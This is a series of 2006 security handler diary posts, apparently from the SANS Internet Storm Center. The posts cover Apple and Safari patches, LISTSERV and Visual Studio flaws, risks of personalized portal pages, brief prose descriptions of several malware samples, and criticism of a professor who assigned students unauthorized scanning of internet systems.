As a work around, and as a matter of best practice, access to rsync servers should be restricted. It is highly recommended to use rsync in conjunction with ssh.

Safari (multiple)

Before going into the detailed bugs: The #1 issue here is the "Launch Services" bug. This is a classic case where a secure-by-default configuration would reduce exposure.  Other browsers exist for OS X (Opera, Firefox). It is not clear which one should be recommended for OS X users. Either way, you may want to review your configuration.

Heap Overflow in WebKit

WebKit is the basic parsing/http client library used by Safari. Apple credits Suresec with the discovery of this vulnerability, but I am not able to find an advisory at the Suresec site. According to Apple, this vulnerability exposes the user to arbitrary code execution just by browsing to a malicious web site.

Javascript Stack Overflow

Malicious javascript could cause arbitrary code execution. Yet another vulnerability of the "browse here and die" kind.

Launch Services

This is the "open safe files after downloading" bug discussed over the last couple of weeks. In particular given the fact that this bug is trivial to exploit, patching is a must. On the other hand: I don't see a good reason to keep this option enabled even after you apply this patch. This vulnerability requires no user interaction aside from browsing to a malicious page. As other web based exploits, it could be embedded in bulletin boards, banner ads, and other content.


Don't we all love RSS feeds ;-) ? This bug will allow javascript to be executed in RSS feeds. Typically, RSS feeds do not include Javascript, and the use of any other markup is limited/prohibited. But as any real standard, there are various implementation choices. This patch will fix the javascript issue in OS X's syndication component.


Last one... iChat! In response to the Leap.A worm/trojan/virus, this patch adds download validation to warn the user of unknown file types before downloading them. Apple considers this an enhancement.


lots of bugs, lots of patches. Sadly, Apple's security response appears to be deficient at this time. We can only hope that this is recognized as an inhibitor to the future growth of Apple in particular in professional environments. I like my (relatively new) iMac, and will spend more time digging into various security features of OS X in the future. Apple made a few very nice choices with OS X (e.g. heavy use of sudo vs. running as "Administrator"/"root"). However, compared to OS's like Linux, there are still a few features I am missing (mandatory access control?). Apple includes a number of well supported open source components in OS X. It has to develop a process to track updates to these components better. While Apple does not use a scheduled patch day, it opts to release a number of patches at the same time, combining the worst features of both worlds (Patch Day: Large number of patches at one time; No Patch Day: Unpredictable patch cycle).

This week, a story made the news about an experiment, where OS X was compromised within 30 minutes using a 0 day exploit. In this case, an authorized attacker was given shell access as a regular user, and he used a so far unpublished exploit to escalate privileges. True, this is an extreme case. Typically attackers do not have remote shell access, and a 0-day was used in this attack. But it highlights the need for defense in depth. OS X has most of the pieces in place (firewall, limited services enabled, use of sudo).



Published: 2006-03-06

Vulnerabilities in L-Soft's LISTSERV and Microsoft's Visual Studio

NGSSoftware announced a number of vulnerabilities in L-Soft's LISTSERV list management system. The vulnerabilities have not been published, but as NGSSoftware worked with L-Soft, they are already fixed in the latest release of LISTSERV, 14.5.

It is strongly recommended that you upgrade to the latest version if you use LISTSERV, as the most critical vulnerability announced allows a remote unauthenticated attacker execution of arbitrary code on the system running LISTSERV.

The latest version of LISTSERV can be downloaded from http://www.lsoft.com/download/listserv.asp and http://www.lsoft.com/download/listservlite.asp (for LISTSERV Lite).

NGSSoftware said that they will publish full details about the flaw in June 2006.

Source code for the buffer overflow vulnerability recently reported in Microsoft's Visual Studio has been released. Visual Studio does not properly validate contents of database project (.dbp) and solution (.sln) files. The result of improper handling is a buffer overflow which can be exploited through the "DataProject" field in a .dbp file.
As the .dbp files are actually text files, it is very simple to craft an exploit.

There is no patch at the moment but, as always, standard rules apply, be very careful what you open.


Published: 2006-03-05

Potential Risks of Personalized Portal Start Pages

Personalized portal start pages have been around for some time, represented by sites such as My Yahoo! and My Excite. Encouraging users to use these sites as browser start pages, such personalized pages offer the convenience of fitting lots of data, such as news, weather, and stocks, on a single web page.

The new generation of portal sites, such as Netvibes and Google Personal Homepage, offers rich functionality that allows the users to include interactive modules in the start page. Before embedding your email or del.icio.us accounts in one of these pages, be mindful the potential risks of using such sites to process sensitive data.

I'd like to bring up two such risks for your consideration:

  1. Providing such portal sites with login credentials to your other accounts threatens confidentiality of your username and password.
  2. Using portlet modules created by a third party may allow unauthorized access to the web session and other information.
Let's consider a few examples.

How Does the Site Store Your Information?

Netvibes is a popular new-generation start page site, offering a clean interface and a nice set of features. In addition to allowing its users to embed a range of data sources on the personalized start page, Netvibes includes several interactive modules. One of them lets a Netvibes user keep an eye on his or her Gmail mailbox:

It's neat. How can Netvibes connect to the user's Gmail mailbox? The person has to supply his or her username and password to Netvibes:

If you decide to take advantage of this functionality, keep in mind that Netvibes makes no representations regarding the safety of your login credentials. The credentials may be sent to the portal server in clear text via HTTP, and you shouldn't expect the credentials to be stored in an encrypted manner. As stated in its Terms of Use, "... your use of the Service is at your sole risk. ... You understand that the technical processing and transmission of the Service, including your Content, may be transfered [sic] unencrypted... "

Other Netvibes modules that might threaten your data's confidentiality allow logging in to Yahoo! Mail, POP accounts, del.icio.us, and Blogmarks.

Who Has Access to Your Information?

Another issue with using such portal sites to process sensitive data is illustrated by portlet modules that users can add to their Google Personal Homepage. It is relatively easy to write custom modules for this site. Google offers numerous such portlets, created by third-party developers for adding to Google Personal Homepage.

When a user attempts to add a third-party module to the personal home page, Google thoughtfully presents the person with the following warning pop-up:

In this message, Google reminds the user that the module, written by a third-party developer, has the ability to access any information the user supplies to this module. If the module you are adding asks for sensitive information, be sure you trust the module's developer before supplying the data.

One nice aspect of third-party modules for Google Personalized Homepage is that its users have the ability to inspect the code that comprised the modules before adding them to the page. If you're well-versed in JavaScript and HTML, this might offer a level of comfort.

What Other Information Can the Module Access?

Another concern related to the use of personalized start pages is that one portlet module might gain access to sensitive session information or to another module. Google warns its users when it notices that a module carries this risk. For instance, when a user attempts to set up a Bloglines notifier module for Google Personalized Homepage, he is presented with the following warning:

In this message, Google alerts the user that the module could give its author access to sensitive information associated with his google.com session, and implies that data from other portlet modules will be accessible, too.

In Conclusion...

I like the idea of personal personalized start pages that improve upon the concept that a portlet module should only contain static data. At the same time, I am weary of using these sites for processing data that I consider sensitive. I think you should be careful, too. There are many new web sites springing up in attempts to offer modern versions of start-up page sites. I hope some of them decide to differentiate themselves from their competitors by implementing a solid data segregation model and a reliable way of protecting their user's data.

For a long list of new-generation personalized start pages take a look at the AJAX Homepages Market Review article on the Web 2.0 Explorer blog.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-03-04


Some interesting malwares reported that you may want to take note. Currently, they are not reported to be prevalent but is worth the effort to understand the threat pose by malwares. Information theft will be one of the biggest threat caused by malware.

1) JS.Ffsniff
JS.Ffsniff is a JavaScript Trojan horse that logs information from HTML forms in Web pages and sends the information to a predefined email address. It can be included with a malicious Mozilla Firefox browser extension.

2) PWSteal.Rivarts
PWSteal.Rivarts is a Trojan horse that steals bank account and sensitive information and sends it to a remote server. It also gathers SSL web certificates and can hijack a browser connection.

Trend Micro has notified us on a Proof-of-Concept infector for Microsoft InfoPath. Infopath is an application used to develop XML-based user forms.

The PoC attempts to infect InfoPath XSN files by:
- Creating a temp directory named "iCab".
- Copying a target xsn file to the directory.
- Extracting the contents of the XSN file.
- Opening the 'script.js' file of the original XSN.
- Inserting a malicious script inside the script.js file, most possibly overwriting the Document:Onload function in the original script. *
- Recreating the original file using makecab.exe, with a specified directive file. *
- Deleting all temporary files and directories. *

However, the behavior (marked with *) was not replicated successfully. Trend Micro named it as PE_ICABDI.A.

UNIX_MARE.G affects systems running Unix. Upon execution, it connects to some predefined websites via TCP port 8080 to download malware. It then opens the affected system to further malicious attacks. It deletes all files in the /tmp folder. It also creates a hidden subfolder named .sess_a4c1cb9ea15105441fb0366b06479082 inside the folder.


Published: 2006-03-03

Security History Poll

From some years already, every year you hear that this will be the 'Security Year', that companies will invest lots of money in security, that will be the 'Security Boom', etc,etc...but still, thing are happening slowly.

Today I was talking with some friends about security in companies...and thinking some years back, we were trying to figure out when we started to think about security in a serious way, that would cover all company, from security policy, hardening, security monitoring, access control,etc,etc...and we realized that there are not even 10-15 years...

Then I thought, why not ask our fellow readers about this, as a personal poll? So the question is , when did you/your company start to think about security in a serious way?

I know that some technologies and concepts are new, and that Gov't agencies are usually exception on this, but anyway, it would be interesting to know.

So, trying to not flood tomorrow's handler on duty, please answer directly to me. I will try to consolidate the answers and put in my next shift.

Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2006-03-03

CME-24 (again)

Yes...it is CME-24 time again...
remember your Nyxem/Kama Sutra/Blackworm friend from last month?
Well...it is suppose to make its round again today, as today is the third day of the month, and "this destructive virus will delete files from a number of popular programs on February 3rd, and on the 3rd day of the month thereafter".
More info on this Blackworm special page.

While looking at F-secure blog , I saw their post about their Virus WorldMap.
It is quite nice! We will probably add it soon to our links page.
Btw, looks like nyxem (CME-24) affected mostly India this month...

Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org.)


Published: 2006-03-02

A Bunch Of Bull in a China Shop

Over the past several days, we've been deluged with responses to our story on Professor Packetslinger and his assignment.  The number of lawyer-wannabes among the infosec community appears to be at an all-time high, and so I've decided to step into the fray and offer a little unsolicited, yet sage advice:

If you think being a geek drives away chicks, being a lawyer is, if anything, worse.

That being said, I'd also like to toss out one more tidbit of wisdom that I've accumulated over time, like mold, within this lump of goo situated between my ears:

The legality of port scanning is an unsettled matter.  The legality of breaking someone else's machine or causing monetary damage isn't.  The problem is this: there's no difference between the two when it happens... and then it's too late.

(Note: I'll tempt fate.  Honey... please don't leave me 'cause of this.. OK?) 

The case that the budding Perry Mason's keep tossing at us is Moulton v. VC3:
  1. This is a civil, not a criminal case.  For those of you who keep claiming that this case proves that port scanning is legal, here is a dime. Take it, call your mother, and tell her there is serious doubt about you ever becoming a lawyer. (...with apologies to Prof. Charles Kingsfield.)
  2. While there was a criminal investigation that preceeded the whole Moulton v VC3 (and VC3 v Moulton) hoopla, all it spoke to was that the costs of investigating a port scan could not be used to push the case beyond the damage limit for criminal prosecution.  The judge stated that the statute required "that the damage must be an impairment to the integrity and availability of the network", and that this particular case did not meet that criteria.
  3. Remember: Most computer crime cases are about damages, and damages are all about interpretation.  This particular damage interpretation took place in the year 2000.  The "cost" of a security incident is a very slippery subject.  Care to be a 2006 test case?
When I take my kids out shopping, and we wander through a store chock full o' purty yet breakable things, a strange compulsion comes over me and I pop out with the typical "Dad" mantra: "We look with our eyes, not with our hands... keep 'em in your pockets."  And while they're all getting to the age now where they just look at me and roll their eyes, the advice is still solid.  In my own way, I'm teaching them an important rule that all adults know, believe, and put into practice in their daily lives: Don't take unnecessary risks.  While it's fun to look at the pretty glass unicorns and that bone china vase is awfully nice... picking them up and playing around with them can only lead to problems.

Ask any infosec professional who has been around the block a time or three, and they'll be able to tell you stories about systems they've popped with nothing but a port scan.  I've been there, I've done that, and I've got the "I tipped over a system using Nmap" t-shirt to prove it.  Stepping beyond simple port scans to vulnerability scans is fraught with even more peril.

The point is this.  If you're learning to be a professional, you need to act like a professional.  If I fired off an on-site or remote test of a client without a signed "get out of jail free" document, my employer should, by rights, discharge me immediately.  While the liability is, perhaps, low and there might be a decent argument that exposing machines that can tip over at the drop of a hat on any network is negligence, it doesn't change the fact that I am acting unprofessionally in this circumstance.

Professionals get permission, in writing, in advance.  If you're not doing that, you're an attacker doing recon, despite how much you might want to convince yourself to the contrary.  And while your actions by themselves may or may not be illegal, you certainly are tempting the law of unintended consequences to place your butt squarely within a sling.

So... unless and until you have authorization, take this Dad's advice: We look with our eyes, not with our hands... keep your packets in your pockets.

Tom Liston - Intelguardians


Published: 2006-03-02

Gmail javascript vulnerability (fixed)

Earlier today we received a report of a javascript vulnerability in gmail. We contacted Google and in the mean time they reported back on it being fixed. The issue seemed rather trivial to exploit.

Our Google contact also pointed out:
In the interest of minimizing the impact that security vulnerabilities have on our end users, we highly encourage anyone who discovers a vulnerability in a Google product or service to follow responsible disclosure policies by contacting us first at security/at/google/dot/com .

I'm sure most users of gmail would rather have security issues handled like they suggest above instead of having it published on some blog first, next some reader finding it and us finally doing the right thing.

Is it that much to ask to send it off to the vendor first ? Even if some vendors wait like forever, or take years to fix things. Not all of them are that way, so let's at the very least give them a heads-up warning.

And if you cannot find the address where to do it, we'll gladly help you search for it.

Swa Frantzen


Published: 2006-03-01

Fresh Apple Patches

Apple released a security update called "2006-001".  It is claiming to update following components:


For detailed information on this update, we'll refer you to apple's article 303382.

This update is very critical to install on your Mac OS X machines:

  • safari gets fixes for 4 separate issues: one of them with the public PoC; 3 of them result in arbitrary code execution and one looks like it allows javascript access to local resources.
    At this point it's unclear how effective the patch against the PoC is. To quote Apple: "This update addresses the issue by performing additional download validation so that the user is warned (in Mac OS X v10.4.5) or the download is not automatically opened (in Mac OS X v10.3.9)". We know from experience that warning users is hardly enough in real life. Still it's better than nothing.
  • ichat, mail get file type protection warnings in an effort to help twarth the worm threat (as exposed by the PoC virus Leap.A)
  • many more ... but you get those for free anyway

On the not so good side: (before I get every Apple fan on my case: I love my powerbook, but it does not mean Apple should not clean up their act a bit)

  • Nice to get an update to PHP 4.4.1, but do note that a quick visit to php.net learns that it released PHP 4.4.1 on October 31st, 2005. That's 4 months!  Add to that that PHP 4.4.2 has been released on January 13th, 2006.  For a open source package this isn't cutting it I'm afraid. Apple really needs to speed up it's testing and dramatically reduce the window of exposure (even if it's not enabled by default).
  • Apple references article 108009 but it's putting all responsability with the end user. Can't we please have it promote using things like anti-virus and other malware preventing software? Sure users should not accept everything and click on anything. But the windows world has proven this approach doesn't work well enough once the OS gets targeted by malware.

Swa Frantzen


Published: 2006-03-01

So, when is a security advisory, not a security advisory?

Microsoft released a security advisory 912945 out of cycle and with little publicity yesterday, the title of which is "Non-security Update for Internet Explorer".  The update appears to change the default behavior of IE in handling ActiveX components.  Given the security issues of ActiveX that have been discussed many times in the past, I'd say that probably does qualify as a security update and I applaud Microsoft for changing the default accept (if that is indeed what the update does, a big if).  I'm just curious as to why this is being done now given their reluctance to issue patches out of cycle in the recent past.  It has been reported (here among other places) that this is the result of losing a patent infringement case last fall, but I haven't seen that officially acknowledged by Microsoft.

Jim Clausing,  jclausing --at-- isc.sans.org


Published: 2006-03-01

How to setup penetration testing exercises.

Based on the many responses we got regarding the 'Packetslinger' diary, here a few notes on how to setup a penetration/cracking exercise.

As a remark: Laws change from area to area. Whatever you do, check your local laws and regulations. Corporate policies, university ethics guidelines and ISP contracts may have to be consulted.

  1. Avoid the use of public networks if possible. Its just too easy to 'fat finger' an IP address. It is all too easy to unintenionally shut down a critical system using an attack as simple as a portscan.
  2. If you have to use a public network, try to setup a VPN to isolate the sources and targets involved.
  3. Ask participants to remove or turn off additional network interfaces (in particular wireless interfaces).
Any attack, even as simple as a portscan, should only be performed with written permission. Even in a lab environment, it may be a good exercise to go through the motions of obtaining written permission from the instructor. It is not always easy to identify the person who has to provide permission. But in general, this should be the 'network owner'. Remember that part of a corporate network may be owned by an ISP, and not the company (or university).

Can you go to jail for running a portscan? Unlikely. But the fact that you consider this question is a good hint that you should get written permission. Internal teams may be given permission  via policy documents. See http://www.sans.org/resources/policies/ for templates (e.g. the Audit Vulnerability Scanning Policy or the Risk Assessment Policy).


Published: 2006-03-01

An Assignment From Professor Packetslinger of the School of Loose Screws

Update #1

We have received an overwhelming number of emails as a result of this diary.  This is to clarify a couple of things.  Yes this professor could have set up its own system for the students to use, yes they could have been instructed that they were to get permission from the owners of the systems first, yes they could have done any number of things to make this a valuable, worthwhile learning experience. That was not done unfortunately.

We have also received several emails asking us to release the name of the institution that this refers to.  We won't do that as we were asked not to in the diary.  It is our policy at the ISC to provide confidentiality when requested.  That is what allows us to cover such controversial subjects as we do.  Yes what is being done by this Institution of Higher Education is incorrect. We are pursuing a satisfactory resolution to this as best we can. We also have not and will not publish the entire document. 

John Bambenek one of our handlers that works at University of Illinois had this to say on the subject:

It's high time that the principles of academic freedom stop providing shields for felonious conduct or eventually the people and the government will take it away all together.

We also have received a number of emails suggesting that we have a legal obligation to report this.  We are aware that this maybe a possibility.  We will assure all of our readers that we will indeed do what is right. We may not talk about what we did but we will do our best to make sure that this type of activity does not continue to go on.  We truly want the Internet to be a safe place for all to work and play. 

Hopefully this will answer some of the questions and concerns that are arising from this article.

Update #2

We have received indications there has been a partial callback of the assignment. We're inviting the professor to contact us directly for any statement and/or clarification he might want to offer.

If he does contact us with a statement we will update the diary again.  Again thanks to all who  did contact us concerning this. Both the good and the bad. We have responded to as many as we could (of course not to the ones that gave us phony email addresses).  We at the ISC appreciate the participation of everyone, whether you agree with us or not. We learn a lot from the pro's and the con's and enjoy the interaction.

Update #3

Since this article is now referenced directly just a note there is a follow up diary on how to setup such assignments in a responsible manner.
Furthermore the amount of feedabck we get will mean that we're unlikely to individually answer unless you are a bit exceptional in remark or are the professor himself. Please no more "portscanning is not illegal" and assumptions the assignment was portscanning only, we've seen those remarks by now a few times.

But again, we'd love to have a chat with the professor himself.

We received an email today from a concerned colleague at one of the state colleges in the US. We promised the colleague that we would not reveal name or school so I won't. It is tempting, but I won't. This is an actual assignment. I am not making this up, this IS the real thing.

So here is the story of the assignment from Professor Packetslinger. In a Computer Security class in the Winter of 2006 (which by the way is next year if I remember correctly) the students have been given an assignment. The assignment is worth 15% of the final grade for the class. (So refusing to do the assignment very well could drop a student from an A to a B or worse in the blink of an eye).

The "TASK"

Student is to perform a remote security evaluation of one or more computer systems. The evaluation should be conducted over the Internet, using tools available in the public domain.

You got it. This is verbatim. Professor Packetslinger wants the students to conduct illegal activity involving port scanning and vulnerability scanning. He wants them to write an evaluation of what they find: what ports are open and what service could be running on them, Host names and IP addresses, OS, version, last update, patch status, what shares are available, what kind of network traffic and what vulnerabilities they see.

Hmm – seems to me that Professor Packetslinger wants the students to do all of the background work for him.

Ok so now what must the students submit in writing to Professor Packetslinger?

Let's see what he wants:

What the student must submit

The note to the students:

In conducting this work, you should imagine yourself to be a security contracted by the owner of the computer system(s) to perform a security evaluation.

(This tells me that Professor Packetslinger is well aware of the laws and the fact that doing this without express permission and authorization IS against the law in most countries and municipalities. The same laws that the students are being asked to violate).

The student must provide a written report which has the following sections: Executive summary, description of tools and techniques used, dates and times of investigations [AKA break ins, our words], examples of data collected, evaluation data, overall evaluation of the system(s) including vulnerabilities.

Can you believe it? Amazing, simply amazing. One important thing Professor Packetslinger failed to request:

Dates of student's incarceration so that they can be excused from class and not counted absent.

Ok, so the concerned colleague who contacted us about Professor Packetslinger and his assignment went on to explain:

"We've barked this one up our own tree of management. Word came down this morning that no direct action will be taken against the professor, but if we catch any students doing these scans against our computers we will not be exempting them from our existing procedure. Specifically, disabling their student account and referring them to the Student Dean of Corrections."

In other words, we won't discipline Professor Packetslinger, we won't stop the assignment from going forward. As long as the students don't scan our computers, it is ok. If they scan our computers they will be reprimanded and lose their privileges on campus.

This is incredible; this University is encouraging illegal activity. They are encouraging students to do something that is, in the words of fellow Handler Adrien:

Illegal, unethical, immoral.
How about just plain stupid and ignorant.

And handler Swa had this to say:

Doing it is illegal in many parts of the world. But using authority to have somebody else do something illegal is in some places on this world even worse than the act itself and any decent prosecutor should chop the prof in fine pieces over this.

Actually inciting somebody to do something illegal (even if the act isn't performed) might be a case on its own. Now if he fails a student over this, they might have no more reason not to put down an official complaint for being asked to perform illegal acts.

First thing to do: recall the assignment; tell the students they should not even consider it.  Next (public) apologies from the professor are the least. But at the _very_ least don't let him near kids anymore, as an educator he's a miserable failure.

This from our resident comedian Tom:

Spamming for Fun and Profit.

It is hard for me as a security professional to understand the logic of Professor Packetslinger. I have relatives in the fair city in which this prestigious state university resides. I am going to ask them to keep an eye on the local paper and shoot me off articles about the arrests. And I definitely will not recommend this school to my friends and relatives. My sympathy goes out to the students that will be forced into completing this assignment. My sympathy to their families, especially those who are caught and charged with computer crimes. I just hope that the dear professor gets to experience the full impact of his illegal, unethical and immoral acts and he too gets to spend some time behind bars.

How about the school?

As fellow Handler Lorna put it

Wonder how the school would feel about a law suit launched against THEM because of this assignment!

The school is allowing this assignment to go forward. They are as guilty of this crime as the professor and the students. They too need to pay the price and a lawsuit against them would be a small price to pay.